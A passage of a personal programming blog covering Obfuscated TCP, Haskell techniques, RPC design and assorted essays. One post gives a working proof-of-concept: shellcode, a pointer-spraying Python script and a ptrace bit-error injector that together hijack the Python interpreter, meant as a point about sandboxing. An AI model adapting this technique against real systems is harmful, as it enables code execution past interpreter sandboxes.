    • The Pohlig-Hellman method is even better, but you can choose a safe prime as your group order to stop it. (A safe prime, p, is such that (p-1)/2 is also prime.)
    • The "index calculus" method uses lots of precomputation against the group order to find specific solutions in that group very quickly. I must admit that I'm a little shaky on how index calculus works, but I've found one empirical result where a Matlab solution was breaking 64-bit discrete logs in < 1 minute, including the precomputation.

    In short, attacks against discrete log in prime order groups are a lot stronger that I suspected. The index calculus method, esp, seems be a killer against 64-bit DH exchanges providing any sort of security. Since we don't have the time (on the server) or the space (in the TCP options) to include a unique group for each exchange, the precomputation advantage means that it's very possible for a sniffer to be breaking these handshakes in real time.

    Damm.

    So it would appear that we need larger key sizes and, possibly elliptic curve based systems (the EC systems, in general, can't be attacked with index calculus based methods). RFC 2385 suggests that 16 bytes in a TCP header is about as much as we would want to add (they are talking about SYN packets, which we don't need to put public values in, but the absolute max is 36 bytes.), which gives us 128-bit public values. Looks like I need to read up on EC systems.

    OTCP - Obfuscated TCP

    Like open SMTP relays, TCP was developed in a kinder, gentler time. With Comcast forging RST packets to disrupt connections and UK ISPs looking to trawl the clickstreams of a nation and sell them (not to mention AT&T copying their backbone to the NSA) it's time that TCP got a little more paranoid.

    The 'correct' solutions are something along the lines of IPSec, but there's no reason to suspect that anyone is going to start using that in droves any time soon. Application level crypto (TLS, SSH etc) is the correct solution for protecting the contents of packets (which would stop the clickstream harvesting style of attacks), but cannot protect the TCP layer (and HTTPS is still not the default for websites).

    An opportunistic obfuscation layer, on by default, would start to address this. By making it transparent to use, it stands a chance of getting some small fraction of traffic to use it. If it were included in Linux distribution kernels we might hope to see it in the wild after a year or so. In certain sectors (BitTorrent users and trackers) we might see it much sooner.

    Our attacker has a couple of weaknesses:

    • Their sniffers are in parallel with their backbone for good reason: if the sniffers fail or cannot keep up with the traffic it's not a big deal. This means that they are limited to observing and injecting traffic. Moving inline (to alter traffic) would be very expensive.
    • Legally, altering traffic seems to be much more sensitive than filtering it. Much of Comcast's statements about their RST injection have been stressing that it's limiting, not forging nor intercepting (however technically false that might be).

    With that in mind I'm going to suggest the following:

    SYN packets from OTCP hosts include an empty TCP option advertising their support. OTCP servers, upon seeing the offer in the RST packet, generate a random 64-bit number (n), less than a globally known prime and return 2^n mod p in another TCP option in the SYN,ACK. The client performs the end of a DH handshake and includes its random number in a third option in the next packet to the server.

    The two hosts now have a shared key which they can use to MAC and encrypt each packet in the subsequent connection (the MAC will be carried in a TCP option). The MAC function includes the TCP header and payload, except the source and destination port numbers. The encryption only covers the TCP payload, not the IP nor TCP packet.

    The hash function and cipher need to very fast and just strong enough; the key is only 64-bits. MD4 for the hash function and AES128 for the cipher, say. (benchmarks for different functions from the Crypto++ library). I suspect that the cipher needs to be a block cipher because packets get retransmitted and reordered. A block cipher in CTR mode based on the sequence number seems to be the best way to deal with this.

    A getsockopt interface would allow userland to find out if a given connection is OTCP, and to get the shared key.

    Q: Can't this be broken by man-in-the-middle attacks?

    Yes. However, note that this would require interception of traffic which is much more costly than sniffers in parallel and legally more troublesome for the attacker. Additionally, userland crypto protocols could be extended to include the shared secret in their certified handshakes, thus giving them MITM-proof security which includes the TCP layer.

    Q: Isn't the key size very small?

    Yes. However, even if the key could be brute forced in 10 seconds; that's still far too much work for a device which is monitoring hundreds or thousands of connections per second.

    Q: Doesn't this break NATs

    NATs rewrite the IP addresses and port numbers in the packets, which we don't include in our MAC protection, so everything should work. If the NAT happens to rebuild the whole packet, the OTCP offer in the SYN packet will be removed. In this case we loose OTCP but, most importantly, we don't break any users.

    NATs which monitor the application level and try to rewrite IP address in there will be broken by this. However, the number of protocols which do this is small and clients may be configured by default not to offer OTCP when the destination port number matches one of these protocols (IRC and FTP spring to mind). This is a hack, but the downside to users of OTCP must be as small as possible.

    Q: So can't I break this by filtering the offer from the SYN packet?

    Yes. Application level protocols could be extended to sense this downgrade attack and stop working, but mostly see the points above: it's much more expensive to do this since it needs to be done in the router and it's legally more troublesome for the attacker.

    Q: Won't this take too much time?

    It's additional CPU load, certainly. The Crypto++ and OpenSSL benchmarks suggest that a full core should be able to handle this at 1 Gbps. Most servers don't see anything like that traffic. Maybe more concerning is the DDoS possibility of using OTCP to force a server to do a 64-bit modexp with a single, unauthenticated packet. A very quick knock-up using the OpenSSL BN library suggests that a single Core2@2.33GHz can do about 50000 random generations and modexps per second. Since the keys are so small, I expect that a tuned implementation (using registers, not bigints) would be about 10x faster. You probably run out of bandwidth from all the SYNs before 500,000 SYNs per second second maxes a single core (it's about 37MB/s). So SYN floods shouldn't be any more of a problem.

    Q: What about my high-performance network?

    I suggest that offering OTCP be disabled by default for private address ranges. Also, distributions probably won't turn it on for their "server" releases. If all else fails, it'll be a sysctl.

    Q: But then I'm wasting CPU time and packet space whenever I'm running SSH or HTTPS

    Right. Userland can turn off OTCP using a sockopt if it wishes, or it could just not enable itself for the default destination ports which these protocols use. (Again, that would be an ugly intrusion of default port numbers into the kernel, but this idea wasn't that beautiful to begin with.)

    Q: So, what's the plan?

    • Write a patch
    • Get it in the mainline
    • Badger distributions to compile it in with server support and client side off by default.
    • In time, get the client side offers turned on by default for "desktop" distributions
    • Save Internet

    Keyspan USB serial dongle drivers for amd64 Ubuntu 7.10

    Ubuntu doesn't ship with this driver, but it's useful: keyspan.ko

    To install, copy to /lib/modules/2.6.22-14-generic/kernel/drivers/usb/serial and depmod -a && modprobe keyspan (as root).

    I've just setup darcs.imp...

    I've just setup darcs.imperialviolet.org, mostly for myself (so that I can keep my laptop and home computer in sync), but also to serve anyone else's agl code needs .

    Maybe there's something t...

    Maybe there's something to this democracy lark after all:

    You will be pleased to know that this amendment was deleted from the
    voting list, thus we did not vote on it. The price of liberty is eternal
    vigilance!

    That's from Thomas Wise. Now I'm not a fan of UKIP - but I'm quite happy with this.

    Also, see comments on the BoingBoing story about this win

    I've had a section here c...

    I've had a section here called Letters I've written to my MP for ages. I've not really had an MP for a while now so it's dried up a little. But fear not, stupidity hasn't left politics! Danny from the EFF alerts us to more stupidity (stupidity in bold) from the EU. However, I don't have time to get a physical letter there before the vote, so an email will have to do.

    Dear Sir,

    I find myself dismayed to read the proposed amendments, numbered 80 and 82 (paragraph 9a) in the Guy Bono report which I believe comes to the vote on Tuesday. This text is replete with misunderstandings which are sadly all too common.

    Amendment 80 proposes legislative action to put the burden of copyright infringement on Internet Service Providers by compelling them to use filtering technologies. Thankfully I don't need to hypothesise about the consequences of this since this experiment has already been attempted in the United States in the 1998 Digital Millennium Copyright Act (DMCA). Despite protections which are probably in excess of what the proposers of this amendment would consider reasonable, the DMCA has lead to a culture of censorship where risk-adverse ISPs are quick to remove any claimed potential liability and then have no incentive to consider to revise this decision. As a short example, the Church of Scientology has repeatedly[1] used the DMCA to hamper the work of those claiming that it's a dangerous cult - a view shared by the German government for one.

    Amendment 82 shows a gross misunderstanding of copyright law as demonstrated by language like "artists who risk seeing their work fall within the public domain in their lifetime" and "consider the competitive disadvantage posed by less generous protection terms in Europe than in the United States". Both of these notions should have been put to rest by the generally excellent Gowers report[2]. The public domain is not a risk. Copyright is very much a temporary monopoly and the public domain is the expected, and correct, fate of copyrighted works. Gowers also notes that artists hardly benefit from the current excessive copyright term let alone a even longer one. Also, the competitive advantage is that foreign rightsholders earn more by charging EU citizens for longer. The advantage exists, but it's not to the EU citizen.

    Please do your utmost to remove these paragraphs from the final report and thus save the CULT committee from ridicule.

    Thank you.

    Yours,

    Adam Langley

    [1] http://www.politechbot.com/p-03281.html
    [2] http://www.hm-treasury.gov.uk/independent_reviews/gowers_review_intellectual_property/gowersreview_index.cfm

    RPCA Semantics

    I'm currently writing an RPC layer in Haskell (and also in C since I expect that I'll need it). I'm using libevent's tagged datastructures (which is why you've see Haskell support for that from me), however I'm not using evrpc because of a number of reasons. Firstly, it uses HTTP as a transport. What troubles me about using HTTP directly as a transport layer is the in-order limits that it imposes. The server cannot deliver replies out of order, nor can it deliver multiple replies for a single request (at least, not with replies to other requests mixed in), nor can it send any unsolicited messages (e.g. lame-mode messages).

    Also, evrpc has no support for lameness, although that's fixable (modulo the HTTP issues). Because of all that I decided to roll my own, called RPCA (because I'm not sufficiently self-centered just to call it Network.RPC :)). I'm including part of the RPCA documentation below for comments.

    RPCA is an RPC system, but that's a pretty loose term covering everything from I2C messages to SOAP. So this is the definition of exactly what an RPCA endpoint should do.

    RPCA RPCs are request, response pairs. Each request has, at most, one response and every response is generated by a single request. That means, at the moment, so unsolicited messages from a server and no streaming replies.

    RPCs are carried over TCP connections and each RPC on a given connection is numbered by the client. Each RPC id must be unique over all RPCs inflight on that TCP connection. (Inflight means that a request has been send, but the client hasn't processed the reply yet.) A reply must come back over the same TCP connection as the request which prompted it. If a TCP connection fails, all RPCs inflight on that connection also fail.

    An RPC request or reply is a pair of byte strings. The first is the header, which is specific to RPCA. The only part of the header which applications need be concerned with is the error code in the reply header. The second is the payload (either the arguments in the case of a request, or the result in the case of a reply). This may be in any form of the applications' choosing, but it expects that it'll be a libevent tagged data structure.

    An RPC is targeted at a service, method pair. A server can export many services but each must have a unique name on that server. (A server is a TCP host + port number.) Each service can have many methods, the names of which need only be unique within that service.

    A Channel is an abstract concept on the client side of a way of delivering RPCs, and getting the replies back from a given server, service pair. It's distinct from a connection in that a Channel can have many connections (usually only one at a time, though) and that a Channel targets a specific service on a server.

    On a given server a service may be up, lame or down. There's no difference between a service which is down and a service which a server doesn't export. Services which are lame are still capable of serving requests, but are requesting that clients stop sending them because, for example, the server is about to shutdown. When a service becomes lame it sends special health messages along all inbound connections to the server, so that clients may be asynchronously notified. (Note that health messages aren't RPCs so this doesn't contradict the above assertion that there are no unsolicited RPC replies.)

    If a Channel is targeted at a single server, service pair, then it's free to assume that the service is immediately up. If not, the server will set the error code in the RPC replies accordingly. If a Channel is load-balancing (i.e. is has multiple possible servers that a request could be routed to) it must wait to perform a health check before routing any requests to any server. A load-balancing Channel stops routing requests to any servers which report lameness.

    Note that lameness is a per-service value so that some services on a server may be lame with others are up.

    Recent Haskell work:binar...

    Recent Haskell work:

    So it's been really very ...

    So it's been really very quiet here for a while. Actually, it's been pretty much that way since I started at Google. A full time job takes up quite a lot of time and energy.

    Mostly my outside coding efforts have been going into Hackage recently (think of it as the Haskell CPAN). If this work would interrest you, you probably already know about it.

    But what prompted me to write this was yet more about the semantic web. I think TBL's Weaving the Web and some of the various articualtions are inspiring. Freebase is cool.

    But I still don't know when the RDF model became the start and end of semantic work. The RDF model says that the semantic world is a list of (subject, relation, object) triples. There are a bunch of semi-standards building on top of that, but I see little questioning of that basic model.

    But it just plain doesn't make sense to me. If we consider a triple to be an arc in a graph of objects, we know the starting and end points of the arc and we have the type of the arc (the relation). But I want to know over what time period that arc is valid. The triple (Adam Langley, lives-in, London) was valid for a few years but isn't now. Also I want to know who is asserting this arc, how sure are they etc. Maybe I want to say that someone has at-least some number of children.

    This results a model something like [Arc] (getting back to Haskell here) where an arc is [(Attribute, Value)] (a key-value list). Without a start, end and type the arc is pretty much useless I'll admit, so those probably are required, but arcs need so much more.

    Rant over.

    For reasons that I won't ...

    For reasons that I won't go into here, someone was asking me about running untrusted code in Python. Just as a musing, I came up with the following:

    Although you might be able to lock down a Python interpreter so that it wouldn't run any code that could do anything bad, you still have to remember that you're running on a real computer. All real computers go subtly wrong and introduce bit errors in memory. If you're very lucky, you'll find that your server has ECC memory, but that only reduces the number of bit errors.

    A Python object has a common header which includes a pointer to its type object. That, in turn, contains function pointers for some operations, like getattr and repr. If we have a pointer to a Python object, bit errors can move that pointer back and forth in memory. If we had lots of Python objects with payloads of pointers to a fake type object, we could hope that a bit error would push one of the pointers such that we can control the type object pointer.

    Let's start with a bit of position independent code that prints "woot" and exits the process:

      SECTION .text
      BITS 32
      mov edx, 5
      mov ebx, 1
      call next
      next:
      pop ecx
      add ecx, 21
      mov eax, 4
      int 0x80
      mov eax, 1
      int 0x80
      db "woot", 10

    Nasm that to t.out and we have our shellcode. Next, construct a python script that amplifies bit errors in an array of pointers in an expliot:

      import struct
      import os
      import array
    
      # load the shellcode
      shellcode = file('t.out', 'r').read()
      # put it in an array
      shellarray = array.array('c', shellcode)
      # get the address of the array and pack it in a pointer
      shelladdress = struct.pack('I', shellarray.buffer_info()[0])
      # replicate that pointer lots into an array
      eviltype_object = array.array('c', shelladdress * 100)
      # and get the address of that and replicate into a string
      evilstring = struct.pack('I', eviltype_object.buffer_info()[0]) * 100
      # create lots of pointers to that string
      evillist = [evilstring] * 100000
      print os.getpid()
      # Call the repr function pointer for every element in evillist for ever
      while True:
        for x in evillist:
          repr(x)
          print 'ping'

    So, memory looks like this:

    [pointer pointer pointer ...] | | | V V V [String-header pointer pointer pointer] | | | V V V [pointer pointer ... ] | | V V [shellcode ]

    So the size of the first level gives us a window in which bit errors can turn into exploits. The size of the second level lets us capture more bit errors (we could also have a couple of strings, in the hope that they are next to each other on the heap, so that we can catch bit-clears too). How many bits of each 32-bit pointer can we expect to be useful? Well, it's probably reasonable to have a 128K evilstring, so that's 15 bits (since changing bits 0 and 1 will screwup our alignment). So, about half of them. To test the above, I cheated and wrote a bit-error-generator:

    int main(int argc, char **argv) {
        const int pid = atoi(argv[1]);
        const unsigned start = strtoul(argv[2], NULL, 0);
        ptrace(PTRACE_ATTACH, pid, NULL, NULL);
        wait(NULL);
        long v = ptrace(PTRACE_PEEKDATA, pid, (void *) start + 32, NULL);
        v += 32;
        ptrace(PTRACE_POKEDATA, pid, (void *) start + 32, (void *) v);
        ptrace(PTRACE_DETACH, pid, NULL, NULL);
        return 0;
    }

    And here's the output:

    % python test.py
      0x80633f8
      30911
      0xB7C24F0CL
      ping
      ping
      woot

    Success!

    If you happen to want to ...

    If you happen to want to run industrial scale document scanners under Linux, I've just open sourced the (small) driver that you'll need: kvss905c on Google Code.

    Signed numbers don't overflow in C

    The title of this post is clearly daft; signed numbers are of a finite size so, of course they overflow. However, physical reality doesn't agree with the C standard which says that compilers can (and do) assume that overflow never happens. Take this, for example:

    int a, b;
    if (a > 0 && b > 0 && a + b > 0) foo();

    A compiler can remove the third test because it's redundant given the assumptions that a + b cannot overflow.

    Clearly, this is pretty scary stuff and it's one of the reasons that I use unsigned everywhere. However, I'm very happy to read the GCC 4.2 change log to see the following:

    New command-line options -fstrict-overflow and -Wstrict-overflow have been added... With -fstrict-overflow, the compiler may assume that signed overflow will not occur, and transform this into an infinite loop. -fstrict-overflow is turned on by default at -O2, and may be disabled via -fno-strict-overflow. The -Wstrict-overflow option may be used to warn about cases where the compiler assumes that signed overflow will not occur. It takes five different levels: -Wstrict-overflow=1 to 5. See the documentation for details. -Wstrict-overflow=1 is enabled by -Wall.

    Continuation monads for state machines

    CPS (continuation-passing-style) is a code style which is often the result of the first step in compiling many Scheme like languages. Since I learned this stuff in Scheme, that's what I'm going to use in the beginning, switching to Haskell soon after.

    So here's a top level Scheme program

    (print (fact 10))

    Rather than return, each function gets a function in its argument list which is its continuation. It's the function for the rest of the program which takes the result of the current function. It's always a tail-call.

    (fact 10 (lambda (v) print v #exit#))

    So here, fact runs and calls its continuation with the result. This continuation is a function which prints the value and calls its continuation, which terminates the program.

    Easy, right?

    So here's a continuation monad in Haskell; but a quick motivation first. What this will give us is something like a Python generator, but which we can pass values in to. So it's a state machine, but without the inverted flow of control and without threads.

    newtype M o a = M ((a->o)->o)
    nstance Monad (M o) where
      return x = M (\c -> c x)
      (M g)>>=f = M (\c -> g (\a -> let M h = f a in h c))
    

    Here, o is the output type (the type of the values which are yielded) and a is the input type. The monad itself is a wrapper around a function of type ((a->o)->o) - a function which takes a continuation and returns the output type of that contination. The bind method is pretty scary, but I can't explain it any better here than the code already does - I'll just end up using more letters to say the same thing. (I have to work it through every time I read it anyway.)

    Now we need a couple of helper functions, but first the example: we're going to build a lightswitch which takes three commands: set (with an Bool value), toggle and query:

    data Result a = NewState (a->Result a) | Value Bool (a->Result a) | Final
    data Input = Set Bool | Toggle | Query

    So all our commands have to yield a value of type Result, querying will return a Value and the other two will return a NewState (which isn't really a result, it just gives the new continuation of the system). Final is there to be the value marking the end of the stream (it doesn't contain a next continuation).

    yield x = M (\c -> Value x c)
    wait = M (\c -> NewState c)

    These functions are how we yeild values. Both are values in M which take a continuation and return a Result which passes that continuation back to the caller.

    runM cm = \x -> let (M f) = cm x in f (\c -> Final)

    This is a function which takes a first input, applies it to something which results in a continuation monad, unwraps that monad and gives it the final continuation, one which eats its given contination and gives Final

    lightswitch state v = do
      case v of
        Set state -> wait >>= lightswitch state
        Toggle -> wait >>= lightswitch (not state)
        Query -> yield state >>= lightswitch state

    This is our lightswitch, it takes an initial state and an Input and updates its state accordingly and returns some Result using either yield or wait. It recurses forever.

    step cont = do
      line <- getLine
        case line of
    	"toggle" -> case cont Toggle of NewState cont' -> step cont'
        	"query" -> case cont Query of Value x cont' -> putStrLn (show x) >> step cont'
    	otherwise -> putStrLn "?" >> step cont

    Here's the code that uses the state machine. It's in the IO monad and runs a little command line where you can type in commands and see the results:

    toggle
    query
    True
    toggle
    query
    False

    It takes a continuation (which is the state of the state machine) and applies an Input to it to get another continuation (state of the machine). You can, of course, keep around any of these states and "undo" something by using an older state.

    And to tie it all together:

    main = step $ runM $ lightswitch False

    We pass False as the initial state of the system and use runM to stick the final continuation on the end; then we have a continuation for the state machine and off we go.

    Hopefully that made some kind of sense. To give credit where it's due: I stole the bind method (and motivation) from this paper.

    The science of fault finding

    When bad things happen, it's a science tracking them down. I had a big one today and I've been thinking about how I go about it (in the hope that I can go about it faster in the future).

    A fault/failure has a chain of events from the thing that changed to the thing that failed to the signal that let you know that something was wrong. Sometimes the failure and the signal are the same thing (what failed? It crashed. What's the signal? It crashed). And some times the thing that changed is the same as the thing that failed (what changed? The O-ring seal burst. What failed? The O-ring). The difference between the thing that changed and the thing that failed is that the latter is the first thing in the chain of events which you can make a value judgment about. Change happens, but failure is bad.

    In the system I'm dealing with we have many, many (many) signals about what's going on. Lots of those signals changed today. Some of them don't have value judgments; they're aren't saying that anything is wrong, just that something is different. The chain of events has many branches and not all of them cause anything bad. However, several important indicators (error rate, latency) do have value judgments and they were creeping up.

    Now beings the science: have ideas, test them out. You can start from both ends of the chain; trying to figure out what changed and trying to work back from the signals. Since this was affecting the whole world there was one very obvious thing that changed at about the right time, but there were several other possibilities. Someone went off to investigate the other possibilities but mostly we concentrated on the big change, although we had no idea how it could have caused a problem.

    Now, at this point I think it would have been helpful to scribble on a whiteboard or on paper to record our facts about the problem. Otherwise you spill working memory and you forget why you discounted ideas. I'm very much thinking of something like the differential meetings in House (the TV show).

    However, I'm mostly thinking about how it took so many people so long to figure out where the failure was. In hindsight, we had all the clues needed fairly quickly and I even knew that they were important because I kept looking at the two signals which turned out to be critical. Neither were out of range, but they told contradictory states of the world. If you had tracked me down in the corridor and asked “How can both A and B be true?” I could have told you pretty quickly. But for some reason I was looking for other factors which could influence the more indirect of the signals. It didn't help that I didn't know the system all that well, but I still should have worked through the logic assuming that they were correct first and not taken 20 minutes to do so.

    Of course, everything is obvious in hindsight, but I still feel that I've missed the lesson somewhere here. Maybe I just need to start writing things down when I get into that state. It's similar to explaining something to someone; it helps you organise your thoughts too. I guess I'll see how that goes next time.

    Ian has launched Thoof, a...

    Ian has launched Thoof, a bookmarking service with a smart recommendation engine. He probably doesn't want a /.'ing right now, but I'm sure that IV's readership load isn't going to cause too many issues.

    [NYTimes on Thoof]

    The good and bad of code reviews in a large organisation

    I write this slightly out of anger/pain - I've had two patches get screwed up by code reviews today, but there are two sides to every code review...

    The aim of code reviews is fairly obvious: if your code can't stand up to being reviewed it probably doesn't belong in the code base. There are some obvious downsides too; the amount of time that they take is the most common one that I hear.

    However, there are some other downsides too. The code review is the most error probe part of the patch writing process. When you're actually writing the patch you are fully engaged with the structure of the code - what you're writing is probably correct and testing mostly catches the rest.

    However, in the code review you're constantly in interrupt mode. A reply comes in and you make changes/answer the points in the reply and send it back. Every iteration is dangerous because you're context switching in and out.

    This can be made worse is the reviewer is picking out stupid things: like changing an unsigned to an int (it was the length of a list, unsigned was correct). However, if it's someone else's code, or even if it's just been a long day you might give in and not bother arguing.

    If the two parties know each other, the probability of a dangerous, picky review is reduced for the same reason that communication of all forms generally works better when people actually know each other. Bad reviews also stem when theres a big organisational difference between the two (because no-one is going to tell a senior engineer that they are a crap reviewer)

    Of course, testing often saves the day here, but this is C++ and not everything tests easily. (In fact, very little tests easily unless test friendliness was a major facet of the original design). Inevitably, people don't run all the (probably pretty manual) tests after every little change and they just make that one last requested change and submit to get the damm thing done before lunch. (That would have been me today - the error wasn't a big deal at all, but it won't have happened without the code review.)

    Code reviews also kill all minor changes. No one fixes typos or slightly bad comments because the effort of getting the review is too much. The barrier is such that a whole class of patches never happen.

    One patch of mine today (I vaguely know the reviewer) got slightly better in one part and slightly worse in another because I could deny the requests which were wrong or silly, but did do that with enough vigor. The other (don't know the reviewer and they are very senior) got worse in almost every respect.

    This is not to say that I don't think that code reviews are a good idea. I think some form is needed in a large code base. But they can easily be not just costly, but dangerous, unless done right.

    This code isn't ready to ...

    This code isn't ready to be a Hackage package yet, it's not nearly as capable as I'd want, but it works: NearestNeighbour2D. It lets you find the closest point to a set of points in 2D efficiently. The limitation is that the tree building isn't incremental at all.

    Lazy lists for IO

    I have somewhat mixed feelings about using lazy lists in Haskell for IO. As a quick introduction - there is a technique in Haskell which lets you write pure fuctional code which processes a stream (lazy list) of data and have that stream of data be read/written on demand. This lets you write very neat stuff like:

    BSL.interact (BSL.map ((+) 1))

    which will, with the correct imports, read chunks of bytes from stdin, add one to each byte (with overflow) and write the chunks back to stdout.

    Now, in one sense this is beautiful, but it really limits the error handling which is where my mixed feelings come from. None the less, I just used it in some code and it did lead to really nice code.

    I was writing a very simple IRC bot. I need it to monitor a channel and pick out certain messages. These messages come from the paging system and happen when something goes wrong. I then pipe them out to dzen and have them appear in the middle of the screen.

    To do this I wrote a pure functional IRC client which isn't in the IO monad and is typed like this:

    data IRCEvent = IRCLine String
                    deriving (Show)
    data IRCMessage = IRCMessage String String String | IRCCommand String | IRCTerminal | IRCError String
                      deriving (Show)
    ircSnoop :: [IRCEvent] -> [IRCMessage]

    Think about what an IRC client would be if it were an element in a dataflow graph. It gets a stream of lines from the server and produces two streams: a stream of data to send to the server (joining channels, replying to pings etc) and a stream of results (events from the paging system in this case). Here, IRCEvent is the type of the input stream. It's a type because I originally had extra input events (join/part a channel etc), but I removed them and lines from the server are all that remains. The two output streams are merged into one and separated by type; so the output stream has to be tee'ed, partly going back to the IRC server and partly to the logic which figures out if the message is important and showing it if it is.

    The code to reply to the IRC server:

    ircWrite handle ((IRCCommand line):messages) = do
      hPutStrLn handle (line ++ "\r")
      hFlush handle
      ircWrite handle messages
    ircWrite handle (x:messages) = unsafeInterleaveIO (ircWrite handle messages) >>= return . ((:) x)

    In the case of an IRCCommand result, we write it to the server and loop. Otherwise, we return the element of the list and, process the rest. Note the use of unsafeInterleaveIO because otherwise we would write this equation:

    ircWrite handle (x:messages) = do
      rest <- ircWrite handle messages
      return (x : rest)

    However, that wouldn't produce any results until we hit the end of the messages list. unsafeInterleaveIO lets us return a result and only perform an IO action when the value is forced.

    So, this works really well in this case. The IRC protocol handling is very clean and it's very little code to do quite a lot. So in this case, lazy IO works. I don't have a good example of where it doesn't right now, but when I hit one I'll write it up.

    I had need of an LRU data...

    I had need of an LRU data structure in Haskell: LRU-0.1

    RDF searching

    You may have seen the recent news about an RDF breakthrough (this even hit non-tech media). Well, the paper is here and is worth a read. It's not actually a terribly well written paper and you'll need to read the paper on the index structure to get what's going on.

    Personally, I would have broadcast the requests to all the index servers because hashing to buckets makes resizing the number of buckets very hard. Also, I'm not sure about their data flow for joining sets. But that's fairly minor.

    If you liked those, try the paper on ranking too.

    Of course, this begs the question of how RDF will ever be useful for anything - because it isn't at the moment and it's been around a while. I'm not going into that now.

    (and, if you needed any more reason to switch to Xmonad from ion, see these recent comments from the author)

    Anyone interrested in pro...

    Anyone interrested in programming languages should watch this video of my colleague, Phil Gossett talking about isomorphisms between types and code.

    Oh yes, and Spiderman 3 is terrible, avoid it.

    I have a new window manag...

    I have a new window manager and it works great. There are a couple of minor bugs (my gvim window runs a little off the bottom of the screen), but it's only the first release.

    (although readers should note that I've used ion for years so the switch to Xmonad may be a little more jarring for some.)

    And while I'm typing, I just want to say how spot on Ed Felten is in this post where he talks about the (increasingly loud) chatter about a “clean slte” design for the internet. While we're talking about things which will probably never happen, checkout ipv6porn (don't mind the domain name, it's perfectly safe for work).

    Why you should believe John

    I said a couple of weeks ago that I'd write up one of the contradictions which believing in Egan-esk consciousness. (Just to recap, that means that you don't think there is anything magic about physical brains which precludes them running, in simulation, on a computer. Thus you're happy with uploads and all that other good stuff.)

    Let me be running a discrete time simulation of your brain on a computer. At some time t you are in state s. I simulate you by running an update function which maps s to s+1, based on some input (vision etc) and produces some side channel outputs (your movement etc).

    Now, it's a computer. I can simulate two people and each will run at half the speed. It doesn't matter that the process which is simulating your brain gets time sliced out for a few hundred milliseconds - it doesn't affect the computation at all.

    So, in the middle of calculating s+1 I can go off and do other work so long as I get there in the end. It appears to you that the rest of the world is speeding up (because you are slowing down).

    So I can just treat your state vector as a huge number and increment it with overflow. There is a lot of other computation which will occur before we hit s+1, but we will hit it. If we keep going we will reach s+2 and so on.

    However, every single being with a state vector less than, or equal, to yours in length will live every possible life while we do it.

    That's certainly a little odd.

    Seems I'm right to hate Powerpoint

    As you'll see from my STM talk (see last post), or any other time you ight have seen me talk. I try now to put works on slides. When I talk you have to listen to me, I might talk about code examples or graphs on slides, but I don't try to bullet point everything I'm going to be saying. I've never liked it because I don't like to listen to talks which have it (I usually feel that it stunts the presenter as they fall back on sticking too closly to the slides).

    But it seems that I'm right: “Research points the finger at PowerPoint” (via The Register)

    Software transactional memory talk

    You can see me giving a talk on STM (specifically the GHC implementation) at Google. I wasn't actually very happy with this talk - I didn't feel like the audience really got it and that's my fault since they were plenty smart enough. I guess I should have taken more time at the beginning to get everything up to speed before diving into the examples. It's very tough, once you know something to remember the aspects that you took to understanding. And, even if you chart it, that doesn't mean that the same steps will work for anyone else.

    Still waiting in that room?...

    So Aaron writes to defend the Chinese Room Argument (go read that link if you don't already know the argument - you should).

    I am absolutely a child who grew up reading Egan (who writes awesome short story books - the full lengths ones are not so great) so the idea of uploaded minds etc is as normal to me as trans-pacific shipping (I happen to be watching the ships in San Francisco bay at the moment).

    Take a neuron from my brain. It's certainly complex: it has many inputs, both dendrites and chemical, and its actions are poorly understood at the moment, but it's nothing magical. It's matter and fields and probably some quantum physics in there. If you think there is something magic about them - you can stop reading now but you have a lot of proof to provide.

    But if it's not magic, we could replace a neuron in my brain with a functional clone and I'm the same person. I'm not suggesting that we could do that tomorrow, but that we could do it at all. Repeat many times, and you have a concious person with a non-natural brain.

    Unless you think that the result isn't concious. Did that feature fade out as more neurons were replaced? If so, and since our artificial neurons are assumed to be perfect functional clones, you do believe that there's something magical about them it seems.

    On the other hand, if I have a concious person with my crazy brain, why can't it run in simulation? My artificial neurons can be implemented using beer bottles and bits of string. It really doesn't matter.

    You say that informational processes have to be interpreted to mean anything. But conciousness is a process reflecting upon itself. That happens whatever the hardware is. Yes it leads to some crazy-sounding conclusions and it's certainly not good for one's sense of self importance, but I'm lead here by the above reasoning which seems sound to me and so I accept it.

    Maybe I'll write up one of those crazy conclusions later.

    Digital Gold Cash

    By way of chump I ran across eCache [Tor hidden service via public HTTPS proxy] which is another crypto based gold backed currency.

    I have a fondness for these things, I'm that way inclined and I recently took advantage for my daily communte time to listen to Rothbard's What Has Government Done to Our Money? (everyone should take the time to read it). It seems that there's quite the industry behind eCache (by which I mean "not very much", but it's still more than I expected).

    eGold has existed for a long time and claims to have 35K 24-hour active accounts, which is tiny compared to VISA, but pretty shockly high otherwise considered. Then there's unlinQ, which converts eGold/eCache to virtual-credit cards (although "only available in fixed denominations, can't be reloaded or refunded" suggests that you loose a lot in the granularity since you generally can't pay for things with multiple cards).

    eCache claims to have 310 grams of gold, which is about $7500 worth of backing. Again, hardly going to set the world on fire, but it's more than some guy in a basement somewhere. I have no hope that it will go anywhere, but it's nice cyberpunk porn.

    Paper on PDF generation for Google Book Search

    I'll be presenting this paper at SPIE in San Jose next Wednesday.

    Google Books: Making the public domain universally accessible

    A pure Haskell JPEG decoder

    Here's something I knocked up: it's both a literate Haskell program and a HTML file describing the JPEG file format

    Security through obscurity silly screws

    This week I ended up with one of these: .

    It's a Seagate SATA disk in an external SATA enclosure. I didn't have an external SATA port on anything useful, so I decided to take the hard drive out and put it in a USB enclosure. This shouldn't have been hard.

    Sadly, Seagate decided to use Torx Plus Security screws on the enclosure. They are like torx screws, but with only five points and a pin in the middle. Even that took a bit of finding out, and you can't get them in sets of "Security bits". You can get them on Amazon for $80. Yes, $80 for a set of 11 screw bits.

    So I drilled the buggers out and even going slowly didn't stop two of the screws welding themselves to the drill.

    Why on Earth do Seagate make that kind of crap? Don't ever buy one.

    Bit syntax for Haskell

    Documentation and source code.

    I must be getting old

    So, yesterday, I utterly forgot a password which I use several times a day. I'd typed it twice in the morning and, about mid afternoon, just stopped. This password was so instinctive I just couldn't believe that I couldn't type it, but no amount of frustration over the next 30 minutes changed that.

    But I remembered that I was logged in using it in a Firefox session which was running. So I managed to extract the password from the memory of the firefox process (more on that later) and, although I now had the password, it didn't make any sense. There was no “Oh! That's it!” moment, and no muscle memory when I tried to type it.

    So I was safe, but a little bit freaked out. A couple of hours later (after a beer, which should have been the obvious solution all along) I sat down at the computer and unlocked the screensaver without even thinking about it. (The screensaver needs the same password). I took several minutes before I realised and now ever having forgotten the password seems as impossible as ever having known it did a couple of hours ago.

    I guess it's only going to be a few short years until I start walking into rooms having forgotten why I went there in the first place.

